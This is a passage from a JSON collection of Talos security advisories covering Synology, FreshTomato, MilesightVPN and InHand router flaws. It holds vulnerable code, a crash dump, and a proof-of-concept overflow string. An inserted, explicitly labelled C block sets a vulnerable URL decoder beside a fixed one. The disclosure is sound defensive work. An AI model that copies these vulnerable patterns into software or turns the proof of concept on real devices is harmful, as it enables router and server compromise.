"obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24582", "CVE-2023-24583"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1710", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:30", "description": "### Summary\n\nAn information disclosure vulnerability exists in the dnsExit DDNS provider functionality of Synology SRM 1.2.3 
RT2600ac 8017-5. A specially crafted man-in-the-middle attack can steal the dnsExit credentials to take over the registered subdomain. An attacker can impersonate the remote dnsExit servers to trigger this vulnerability.\n\n### Tested Versions\n\nSynology SRM 1.2.3 RT2600ac 8017-5 \nSynology DSM 6.2.3 25426 (confirmed by vendor)\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n### CWE\n\nCWE-319 - Cleartext Transmission of Sensitive Information\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology routers.\n\nSRM supports DDNS (Dynamic DNS) for Synology\u2019s DDNS and a set of third-party providers. This feature allows a user to assign a DNS entry to their public IP address, in order to serve content remotely.\n\nOne of the third-party providers supported is [dnsExit](<https://www.dnsexit.com/Direct.sv?cmd=ipClients>). \nWhen this provider is used, the IP address update is performed by `/usr/syno/bin/ddns/dnsexit.php`:\n \n \n #!/usr/bin/php -d open_basedir=/usr/syno/bin/ddns\n <?php\n \n if ($argc !== 5) {\n echo 'badparam';\n exit();\n }\n \n $account = (string)$argv[1];\n $pwd = (string)$argv[2];\n $hostname = (string)$argv[3];\n $ip = (string)$argv[4];\n \n // check the hostname contains '.'\n if (strpos($hostname, '.') === false) {\n echo 'badparam';\n exit();\n }\n \n // only for IPv4 format\n if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {\n echo \"badparam\";\n exit();\n }\n \n // [1]\n $url = 'http://update.dnsexit.com/RemoteUpdate.sv?login='.$account.'&password='.$pwd.'&host='.$hostname.'&myip='.$ip;\n \n $req = curl_init();\n curl_setopt($req, CURLOPT_URL, $url);\n $res = curl_exec($req);\n curl_close($req);\n \n\nAt [1] we can see that the request is performed over `http` rather than `https`, allowing an attacker to perform a man-in-the-middle attack and steal the dnsExit credentials.\n\n### 
Timeline\n\n2020-05-12 - Vendor Disclosure \n2020-06-02 - Disclosure release deadline requested and Talos extended to 2020-09-30 \n2020-06-22 - 2nd extension requested; disclosure extended to 2020-10-30 \n2020-10-29 - Public Release\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-29T00:00:00", "type": "talos", "title": "Synology SRM dnsExit DDNS provider information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27656", "CVE-2020-27657"], "modified": "2020-10-29T00:00:00", "id": "TALOS-2020-1071", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1071", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T18:56:20", "description": "### Summary\n\nA memory corruption vulnerability exists in the httpd unescape functionality of FreshTomato 2022.1. A specially-crafted HTTP request can lead to memory corruption. 
An attacker can send a network request to trigger this vulnerability.\n\n### Tested Versions\n\nFreshTomato 2022.1\n\n### Product URLs\n\nFreshTomato - <https://www.freshtomato.org/>\n\n### CVSSv3 Score\n\n5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nFreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\nFreshTomato\u2019s httpd component has a file named `cgi.c` that contains CGI helper functions. One of these functions is `unescape`:\n \n \n static void unescape(char *s)\n {\n unsigned int c;\n \n while ((s = strpbrk(s, \"%+\"))) { [1]\n if (*s == '%') {\n sscanf(s + 1, \"%02x\", &c); [2]\n *s++ = (char) c; [3]\n strcpy(s, s + 2); [4]\n }\n else if (*s == '+') {\n *s++ = ' ';\n }\n }\n }\n \n\nThis function takes a string as argument and, if it is URL-encoded, decodes it in place. At `[1]`, there is a loop that takes the next `%` or `+` in the string. If a `%` is found, then at `[2]` the following two characters are converted from hex values to a single character. At `[3]` the converted character replaces the `%` character and the string pointer advances. At `[4]` the remainder of the string, after the already-parsed URL-encoded character, is moved left by two positions, overwriting the two hex digits that were just consumed. A string like \u201cA\u2026B%41%42\u201d would go through the following steps:\n \n \n |A|...|B|%|4|1|%|4|2|NULL| at [1]/[2]\n |A|...|B|A|4|1|%|4|2|NULL| after [3]\n |A|...|B|A|%|4|2|NULL|2|NULL| after [4]\n \n\nEventually, after a second iteration of the loop, we would end up like this:\n \n \n |A|...|B|A|B|NULL|2|NULL|2|NULL| after [4]\n \n\n#### CVE-2022-28664 - mips branch - httpd unescape memory corruption\n\nThe `freshtomato-mips` branch has a vulnerable URL-decoding feature that can lead to memory corruption. The `unescape` function assumes, wrongly, that after a `%` there are always at least two characters. 
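Added example, not part of the advisory and not FreshTomato's own patch: the published `unescape` is reproduced as written for comparison, a bounded replacement decodes the same inputs with separate read and write cursors, and a small harness runs the original on the input `A%4` inside a padded buffer so the read past the terminator can be observed without crashing. All inputs are constructed for this example:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* The FreshTomato decoder as published, for comparison. Kept as-is on
 * purpose: this is the vulnerable code, not a fix. */
void unescape_vuln(char *s)
{
    unsigned int c;

    while ((s = strpbrk(s, "%+"))) {
        if (*s == '%') {
            sscanf(s + 1, "%02x", &c);
            *s++ = (char) c;
            strcpy(s, s + 2);
        }
        else if (*s == '+') {
            *s++ = ' ';
        }
    }
}

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    return c - 'a' + 10;        /* only called after isxdigit() */
}

/* Hardened decoder: one pass, a read cursor r and a write cursor w, and a '%'
 * is only decoded when two hex digits actually follow it. Anything else is
 * copied through unchanged, so a trailing "%" or "%4" can never move the
 * cursor past the terminator. */
void unescape_safe(char *s)
{
    char *r = s, *w = s;
    while (*r) {
        if (*r == '%' && isxdigit((unsigned char)r[1]) && isxdigit((unsigned char)r[2])) {
            *w++ = (char)(hexval((unsigned char)r[1]) * 16 + hexval((unsigned char)r[2]));
            r += 3;
        } else if (*r == '+') {
            *w++ = ' ';
            r++;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
}

/* Shows the out-of-bounds read at [4] without crashing: the input "A%4" sits
 * in a larger buffer with "XY" placed after its terminator. With only one
 * character after the '%', strcpy(s, s + 2) starts two bytes past the NUL
 * and pulls "XY" into the string. Returns 1 if that happened. */
int vuln_reads_past_terminator(void)
{
    char buf[32] = { 'A', '%', '4', '\0', 'X', 'Y', '\0' };
    unescape_vuln(buf);
    return strcmp(buf + 2, "XY") == 0;
}

int main(void)
{
    char a[] = "A%41%42", b[] = "A%41%42", c[] = "%4";
    unescape_vuln(a);
    unescape_safe(b);
    unescape_safe(c);
    printf("vuln  \"A%%41%%42\" -> \"%s\"\n", a);
    printf("safe  \"A%%41%%42\" -> \"%s\"\n", b);
    printf("safe  \"%%4\"      -> \"%s\"\n", c);
    printf("vuln reads past the terminator on \"A%%4\": %d\n", vuln_reads_past_terminator());
    return 0;
}
```

On real input the bytes past the terminator are whatever follows the request buffer on the stack or heap, which is why the advisory classes this as an out-of-bounds read and write rather than a harmless truncation. The cursor-based version is also linear time, whereas the original shifts the tail with `strcpy` on every escape.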
If this is not the case, the instruction at `[4]` would cause an out-of-bounds read and write.\n\n#### CVE-2022-28665 - arm branch - httpd unescape memory corruption\n\nThe `freshtomato-arm` branch has a vulnerable URL-decoding feature that can lead to memory corruption. The `unescape` function assumes, wrongly, that after a `%` there are always at least two characters. If this is not the case, the instruction at `[4]` would cause an out-of-bounds read and write.\n\n### Timeline\n\n2022-04-11 - Initial vendor contact \n2022-04-27 - Vendor Disclosure \n2022-05-06 - Vendor Patch Release \n2022-07-27 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T00:00:00", "type": "talos", "title": "FreshTomato httpd unescape memory corruption vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28664", "CVE-2022-28665"], "modified": "2022-07-27T00:00:00", "id": "TALOS-2022-1509", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1509", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:36", "description": 
"# Talos Vulnerability Report\n\n### TALOS-2023-1704\n\n## Milesight MilesightVPN requestHandlers.js detail_device cross-site scripting (XSS) vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24497,CVE-2023-24496\n\n##### SUMMARY\n\nCross-site scripting (XSS) vulnerabilities exist in the requestHandlers.js detail_device functionality of Milesight VPN v2.0.2. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n4.7 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N \n6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - chain: TALOS-2023-1702\n\n##### CWE\n\nCWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\n\n##### DETAILS\n\nMilesightVPN is software that simplifies the setup of VPN tunnels for Milesight products and allows monitoring the connection status through a web interface.\n\nThe MilesightVPN exposes the `/Device_Auth` API, used to authenticate to the server and to get an OpenVPN configuration file. This API is used by the various Milesight devices; it requires the serial number, the authentication code, the device name and the subnet of the device. 
Essentially the API expects four entries in the POST payload:\n\n * authcode: is a secret generated by the MilesightVPN\n * subnet: the subnet mask of the main network used by the device\n * device_name: the identifier of the device that is connecting to the MilesightVPN server\n * sn: is the serial number of the device that is connecting to the MilesightVPN server\n\nAfter been registered, the device will appear in the Device table showing the provided information. This Device table is in the landing page after the login.\n\nFollowing the relevant portion of the Embedded JavaScript template related to the device table:\n \n \n <table class=\"table table-no-bordered\" data-striped=\"true\" data-height=\"100%\" id=\"tbl_content\" data-toggle=\"table\" data-url=\"/detail_device\" data-target=\"/detail_device\" data-id-field=\"sn\" data-pagination=\"true\" data-sort-stable=\"true\" data-sort-name=\"connect_time\" data-sort-order=\"asc\" data-toolbar=\"#deviceToolbar\" data-search=\"true\" data-search-on-enter-key=\"true\" data-cache=\"false\">\n <thead>\n <tr>\n <th data-field=\"name\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"name_formatter\"><%=lang.detail.device.name%></th>\n <th data-field=\"status\" data-width=\"10%\" data-sortable=\"true\" data-formatter=\"status_formatter\"><%=lang.detail.device.status%></th>\n <th data-field=\"sn\" data-width=\"10%\" data-sortable=\"true\"><%=lang.detail.device.sn%></th>\n <th data-field=\"virtual_ip\" data-width=\"15%\" data-sortable=\"true\"><%=lang.detail.device.virtualip%></th>\n <th data-field=\"real_ip\" data-width=\"15%\" data-sortable=\"true\"><%=lang.detail.device.realip%></th>\n <th data-field=\"remote_subnet\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"subnet_formatter\"><%=lang.detail.device.subnet%></th>\n <th data-field=\"connect_time\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"time_formatter\"><%=lang.detail.device.time%></th>\n <th data-field=\"history\" 
data-width=\"10%\" data-formatter=\"history_formatter\"><%=lang.detail.device.history%></th>\n </tr>\n </thead>\n \n\nThe data of this table is filled using the `requestHandlers.js`\u2019s `detail_device` function:\n \n \n function detail_device(res,postdata,connection){\n var $sql=\"select * from device\";\n $sql+=' left join ';\n $sql+=' (select count(*) as total,remote_subnet from device group by remote_subnet) repeatsubnet on repeatsubnet.remote_subnet=device.remote_subnet';\n var result={};\n connection.query($sql).then(function(data){\n if(data['error'])\n {\n res.write(JSON.stringify(result));\n res.end();\n }\n else\n {\n if(data['result'].length>0)\n {\n result=JSON.stringify(data['result']);\n res.writeHead(200,{'Content-Type':'application/json','Content-length':Buffer.byteLength(result, 'utf8')});\n res.write(result);\n res.end();\n }\n else\n {\n res.write(JSON.stringify([]));\n res.end();\n }\n }\n });\n }\n \n\nThe `device` table has the following schema:\n \n \n +---------------+--------------+------+-----+---------+-------+\n | Field | Type | Null | Key | Default | Extra |\n +---------------+--------------+------+-----+---------+-------+\n | name | varchar(255) | YES | | NULL | |\n | sn | varchar(12) | NO | PRI | NULL | |\n | virtual_ip | varchar(15) | YES | | NULL | |\n | real_ip | varchar(32) | YES | | NULL | |\n | remote_subnet | varchar(32) | YES | | NULL | |\n | connect_time | int | YES | | NULL | |\n | status | int | YES | | NULL | |\n +---------------+--------------+------+-----+---------+-------+\n \n\nThe `device` table is populated through the registered devices, so through the `/Device_Auth` API.\n\nFrom when a Milesight device is registered, using the `/Device_Auth` API, until showing its data in the web interface, no checks about the data are performed, this can lead an XSS vulnerability. An attacker can upload malicious Javascript code through the `/Device_Auth` API, registering a device. 
An admin of the server would execute this malicious javascript whenever they viewed the details page due to the stored XSS. An attacker would need to know the Authorization Code of the server to actually use the `/Device_Auth` API. But because of TALOS-2023-1702, this information can be easily retrieved by an attacker.\n\n#### CVE-2023-24496 - XSS in the name field\n\nAn attacker can upload malicious Javascript code through the `/Device_Auth`\u2019s `device_name` parameter. The `device_name` value will be stored in the `device` database as the `name` field.\n\n#### CVE-2023-24497 - XSS in the remote_subnet field\n\nAn attacker can upload malicious Javascript code through the `/Device_Auth`\u2019s `subnet` parameter. The `subnet` value will be stored in the `device` database as the `remote_subnet` field.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1740\n\nPrevious Report\n\nTALOS-2023-1703\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.7, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN requestHandlers.js detail_device cross-site scripting (XSS) vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24496", "CVE-2023-24497"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1704", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1704", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-12-02T18:56:28", "description": "### Summary\n\nMultiple improper input validation vulnerabilities exists in the libnvram.so nvram_import functionality 
of InHand Networks InRouter302 V3.5.4. A specially-crafted file can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nInHand Networks InRouter302 V3.5.4\n\n### Product URLs\n\nInRouter302 - <https://www.inhandnetworks.com/products/inrouter300.html>\n\n### CVSSv3 Score\n\n9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nThe InRouter302 is an industrial LTE router. It features remote management functionality and several security protection mechanisms, such as VPN technologies, firewall functionality, authorization management and several other features.\n\nThe InRouter302 extensively uses a library called `libnvram.so`. This library is used, among other things, to manipulate the nvram-related data. One of the web server functions that uses the library is called `upload.cgi_output`:\n \n \n void upload.cgi_output(void)\n \n {\n [...]\n \n type = (char *)webcgi_get(\"type\"); [1]\n filename = (char *)webcgi_get(\"filename\"); [2]\n if ((type == (char *)0x0) || (*type == '\\0')) {\n [...]\n }\n else {\n if ((filename != (char *)0x0) && (*filename != '\\0')) {\n syslog(7,\"filename: %s...\",filename);\n [...]\n iVar1 = strcasecmp(type,\"config\");\n if (iVar1 != 0) {\n [...]\n }\n syslog(7,\"import config...\");\n iVar1 = nvram_import(filename); [3]\n [...]\n }\n [...]\n }\n \n\nA function called before `upload.cgi_output` parses the request, including the `type` and `filename` variables. Then `upload.cgi_output` fetches the parsed variables `type` and `filename` at `[1]` and `[2]`, respectively. If the uploaded file is of the \u201cconfiguration\u201d `type`, the code at `[3]` is eventually reached and `nvram_import` is called. 
The `libnvram.so`\u2019s `nvram_import` function will take the provided file, parse it, and update the nvram configuration accordingly.\n\nThe `libnvram.so` has a function called `validate`:\n \n \n undefined4 validate(char *key_to_change,char *new_value)\n \n {\n [...]\n \n if (new_value == (char *)0x0) {\n new_value = \"\";\n }\n opt_value = opt_validates;\n nvram_key = \"language\";\n do {\n iVar1 = strcmp(nvram_key,key_to_change);\n if (iVar1 == 0) {\n ret_code = (*(code *)opt_value->validation_function)\n (opt_value->min_length,opt_value->max_length,opt_value->select_values,\n new_value);\n return ret_code;\n }\n opt_value = opt_value + 1;\n nvram_key = opt_value->nvram_key;\n } while (nvram_key != (char *)0x0);\n syslog(7,\"var %s = %s is unknown!\",key_to_change,new_value);\n return 0xffffffff;\n }\n \n\nThis function is called with two arguments: the nvram entry\u2019s key to change and its new value. This function will check, based on the key, if the new value respects certain criteria. The caller will then, based on the result, change the entry value or not. The `validate` function is used for a set of nvram keys. `nvram_import`, by contrast, does not validate the values of the entries it is allowed to change. This can invalidate some assumptions made across the other binaries that use the nvram values, and can lead to code execution.\n\n#### CVE-2022-26780 - httpd\u2019s user_define_init stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_init` function. 
Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n\nThe `user_define_init` function:\n \n \n int user_define_init(timeout_struct *timeout_struct)\n \n {\n char *user_define_timeouts;\n int idx;\n char service_name [64];\n undefined4 service_timeout [3];\n \n idx = 0;\n memset(service_name,0,0x40);\n service_timeout[0] = 0;\n memset(timeout_struct,0,0x1a90);\n user_define_timeouts = (char *)nvram_default_get(\"user_define_timeout\",0);\n if ((user_define_timeouts != (char *)0x0) &&\n (user_define_timeouts = strtok(user_define_timeouts,\",\"), user_define_timeouts != (char *)0x0))\n {\n do {\n while( true ) {\n sscanf(user_define_timeouts,\"%[^:]:%d\",service_name,service_timeout); [4]\n if (service_name[0] != '\\0') break;\n user_define_timeouts = strtok((char *)0x0,\",\");\n if (user_define_timeouts == (char *)0x0) {\n return idx;\n }\n }\n user_define_timeouts = strcpy(timeout_struct[idx].service_name,service_name);\n idx = idx + 1;\n *(undefined4 *)(user_define_timeouts + 0x40) = service_timeout[0];\n user_define_timeouts = strtok((char *)0x0,\",\");\n } while (user_define_timeouts != (char *)0x0);\n }\n return idx;\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma-separated string. Each value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX`, where `XX` ranges from `00` to `99`. However, anyone who can control the `user_define_timeout` nvram variable can place arbitrary values in it. If the provided `service_name` is longer than 64 bytes, the unbounded `%[^:]` conversion of the `sscanf` call at `[4]` writes past the end of the 64-byte `service_name` buffer, causing a stack-based buffer overflow. 
This can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $a1 : 0x00466b40 \u2192 0x0000002c (\",\"?)\n $a2 : 0x0\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0xffffffff\n $t2 : 0x77750000 \u2192 0x464c457f\n $t3 : 0xf0000000\n $t4 : 0x1\n $t5 : 0x7763e768 \u2192 0x00000000\n $t6 : 0x77643a48 \u2192 0x6c5f5f00\n $t7 : 0x0040f7d4 \u2192 0x00002021 (\"! \"?)\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x42424242 (\"BBBB\"?)\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x283\n $t9 : 0x7766ec00 \u2192 <strspn+0> move v0, zero\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_01\"\n $pc : 0x0040f7c4 \u2192 <user_define_init+308> jr ra\n $sp : 0x7faf7208 \u2192 0x00000000\n $hi : 0x19e\n $lo : 0x1e78d\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7faf7208\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7faf720c\u2502+0x0004: 0x00000000\n 0x7faf7210\u2502+0x0008: 
0x7faf7220 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7faf7214\u2502+0x000c: 0x7faf7260 \u2192 0x00000001\n 0x7faf7218\u2502+0x0010: 0x00484d90\n 0x7faf721c\u2502+0x0014: 0x00000000\n 0x7faf7220\u2502+0x0018: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7faf7224\u2502+0x001c: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40f7b8 <user_define_init+296> lw s2, 108(sp)\n 0x40f7bc <user_define_init+300> lw s1, 104(sp)\n 0x40f7c0 <user_define_init+304> lw s0, 100(sp)\n \u2192 0x40f7c4 <user_define_init+308> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:1` and then the code at `[4]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, has value 0x41414141.\n\n#### CVE-2022-26781 - httpd\u2019s user_define_print stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_print` function. 
Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n\nThe `user_define_print` function:\n \n \n undefined4 user_define_print(timeout_struct *timeout_struct)\n \n {\n timeout_struct *timeout_struct_cursor;\n timeout_struct *ptVar2;\n char user_define_timeout [3200];\n char temp_define_timeout [32];\n \n temp_define_timeout._0_4_ = 0;\n temp_define_timeout._4_4_ = 0;\n temp_define_timeout._8_4_ = 0;\n temp_define_timeout._12_4_ = 0;\n temp_define_timeout._16_4_ = 0;\n temp_define_timeout._20_4_ = 0;\n temp_define_timeout._24_4_ = 0;\n temp_define_timeout._28_4_ = 0;\n memset(user_define_timeout,0,0xc80);\n timeout_struct_cursor = timeout_struct;\n do {\n while (timeout_struct_cursor->service_name[0] != '\\0') {\n next_entry = timeout_struct_cursor + 1;\n sprintf(temp_define_timeout,\"%s:%d,\",timeout_struct_cursor,timeout_struct_cursor->value); [5]\n strcat(user_define_timeout,temp_define_timeout);\n timeout_struct_cursor = next_entry;\n if (next_entry == timeout_struct + 100) goto FUNCTON_END;\n }\n timeout_struct_cursor = timeout_struct_cursor + 1;\n } while (timeout_struct_cursor != timeout_struct + 100);\n FUNCTON_END:\n [...]\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma-separated string. Each value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX`, where `XX` ranges from `00` to `99`. However, anyone who can control the `user_define_timeout` nvram variable can place arbitrary values in it. If the provided `service_name` is longer than 32 bytes, the `sprintf` at `[5]` writes past the end of the 32-byte `temp_define_timeout` buffer, causing a stack-based buffer overflow. 
